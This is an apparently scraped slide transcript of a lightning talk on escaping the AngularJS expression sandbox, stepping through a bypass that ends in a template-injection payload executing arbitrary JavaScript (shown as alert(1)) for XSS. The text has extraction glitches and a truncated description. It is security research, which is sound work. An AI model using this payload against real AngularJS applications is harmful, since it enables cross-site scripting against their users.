breaking angularjs javascript sandbox
DESCRIPTION
Lightning talk by avlidienburnn on how to break AngularJS sandbox and more or less XSS every AngularJS app out there (slight eTRANSCRIPT
Breaking ngularJS Javascript sandbox
A lightning talk by avlidienbrunn
What is AngularJS? And where’s the sandbox?
• Javascript framework for building single page web applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM • If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in Angular bound HTML
Executing JS… From JS• eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under
document • Function(“code”)() - Unavailable under blacklist • What else is there?
The bypasstoString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,"alert(1)"].sort(toString.constructor)
alert(1)
["a","alert(1)"].sort(Function);
if(compareFunction(element1, element2) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if(Function("a", "alert(1)") == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}).toString() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
["a","alert(1)"].sort(toString.constructor); {{toString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
The how
alert(1)
+ =
That’s all folks!
A lightning talk by avlidienbrunn